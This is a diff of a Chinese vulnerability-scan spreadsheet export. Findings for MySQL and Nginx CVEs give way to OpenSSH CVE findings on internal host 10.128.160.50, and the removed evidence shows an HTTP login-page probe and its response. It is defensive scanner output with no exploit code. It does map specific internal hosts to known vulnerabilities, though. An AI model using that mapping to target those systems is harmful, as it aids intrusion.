-          <t>2026-07-13 21:25</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M28" t="inlineStr">
         <is>
-          <t>192.168.50.76</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N28" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O28" t="inlineStr">
@@ -4337,7 +3640,7 @@
       </c>
       <c r="T28" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U28" t="inlineStr"/>
@@ -4348,29 +3651,7 @@
       </c>
       <c r="W28" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X28" t="inlineStr">
@@ -4387,7 +3668,7 @@
     <row r="29">
       <c r="A29" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH身份验证绕过漏洞(CVE-2023-51767)</t>
         </is>
       </c>
       <c r="B29" t="inlineStr">
@@ -4397,18 +3678,22 @@
       </c>
       <c r="C29" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D29" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D29" t="inlineStr">
+        <is>
+          <t>绕过认证</t>
+        </is>
+      </c>
       <c r="E29" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>官方已发布新版本修复该漏洞，请根据具体发行版将openssh更新到最新版本。</t>
         </is>
       </c>
       <c r="F29" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>从OpenSSH 到 9.6，当使用常见类型的 DRAM 时，可能会允许行锤攻击（用于绕过身份验证），因为 mm_answer_authpassword 中已验证的整数值无法抵抗单个位的翻转。注意：这适用于攻击者-受害者共置的某种威胁模型，其中攻击者拥有用户权限。</t>
         </is>
       </c>
       <c r="G29" t="inlineStr">
@@ -4418,37 +3703,37 @@
       </c>
       <c r="H29" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I29" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J29" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2023-51767</t>
         </is>
       </c>
       <c r="K29" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L29" t="inlineStr">
         <is>
-          <t>2026-07-13 21:25</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M29" t="inlineStr">
         <is>
-          <t>192.168.50.76</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N29" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O29" t="inlineStr">
@@ -4470,7 +3755,7 @@
       </c>
       <c r="T29" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U29" t="inlineStr"/>
@@ -4481,29 +3766,7 @@
       </c>
       <c r="W29" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X29" t="inlineStr">
@@ -4520,7 +3783,7 @@
     <row r="30">
       <c r="A30" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH x11_open_helper()函数安全限制绕过漏洞(CVE-2015-5352)</t>
         </is>
       </c>
       <c r="B30" t="inlineStr">
@@ -4533,15 +3796,20 @@
           <t>中危</t>
         </is>
       </c>
-      <c r="D30" t="inlineStr"/>
+      <c r="D30" t="inlineStr">
+        <is>
+          <t>防御绕过</t>
+        </is>
+      </c>
       <c r="E30" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：
+http://www.openssh.com/txt/release-6.9</t>
         </is>
       </c>
       <c r="F30" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 6.9之前版本的ssh中的channels.c文件中的‘x11_open_helper’函数存在安全漏洞，该漏洞源于程序禁用ForwardX11Trusted模式时，没有检查X连接的refusal deadline。远程攻击者可借助特制的连接利用该漏洞绕过既定的访问限制。</t>
         </is>
       </c>
       <c r="G30" t="inlineStr">
@@ -4551,37 +3819,37 @@
       </c>
       <c r="H30" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I30" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J30" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2015-5352</t>
         </is>
       </c>
       <c r="K30" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L30" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M30" t="inlineStr">
         <is>
-          <t>192.168.54.100</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N30" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O30" t="inlineStr">
@@ -4603,7 +3871,7 @@
       </c>
       <c r="T30" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U30" t="inlineStr"/>
@@ -4614,29 +3882,7 @@
       </c>
       <c r="W30" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X30" t="inlineStr">
@@ -4653,7 +3899,7 @@
     <row r="31">
       <c r="A31" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>openssh 安全漏洞 (CVE-2023-51384)</t>
         </is>
       </c>
       <c r="B31" t="inlineStr">
@@ -4663,18 +3909,18 @@
       </c>
       <c r="C31" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D31" t="inlineStr"/>
       <c r="E31" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
         </is>
       </c>
       <c r="F31" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于当在添加PKCS11托管私钥的过程中指定目标约束时，这些约束仅应用于第一个密钥。</t>
         </is>
       </c>
       <c r="G31" t="inlineStr">
@@ -4684,37 +3930,37 @@
       </c>
       <c r="H31" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I31" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J31" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2023-51384</t>
         </is>
       </c>
       <c r="K31" t="inlineStr">
         <is>
-          <t>2026-07-14 09:11</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L31" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M31" t="inlineStr">
         <is>
-          <t>192.168.54.100</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N31" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O31" t="inlineStr">
@@ -4736,7 +3982,7 @@
       </c>
       <c r="T31" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U31" t="inlineStr"/>
@@ -4747,29 +3993,7 @@
       </c>
       <c r="W31" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X31" t="inlineStr">
@@ -4786,7 +4010,7 @@
     <row r="32">
       <c r="A32" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH 安全漏洞(CVE-2016-0777)</t>
         </is>
       </c>
       <c r="B32" t="inlineStr">
@@ -4796,18 +4020,22 @@
       </c>
       <c r="C32" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D32" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D32" t="inlineStr">
+        <is>
+          <t>信息泄露</t>
+        </is>
+      </c>
       <c r="E32" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.openssh.com/txt/release-7.1p2</t>
         </is>
       </c>
       <c r="F32" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>远程攻击者可通过请求传输整个缓冲区利用该漏洞获取进程内存中的敏感信息。</t>
         </is>
       </c>
       <c r="G32" t="inlineStr">
@@ -4817,37 +4045,37 @@
       </c>
       <c r="H32" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I32" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J32" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2016-0777</t>
         </is>
       </c>
       <c r="K32" t="inlineStr">
         <is>
-          <t>2026-07-13 21:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L32" t="inlineStr">
         <is>
-          <t>2026-07-13 21:33</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M32" t="inlineStr">
         <is>
-          <t>192.168.50.143</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N32" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O32" t="inlineStr">
@@ -4869,7 +4097,7 @@
       </c>
       <c r="T32" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U32" t="inlineStr"/>
@@ -4880,29 +4108,7 @@
       </c>
       <c r="W32" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" 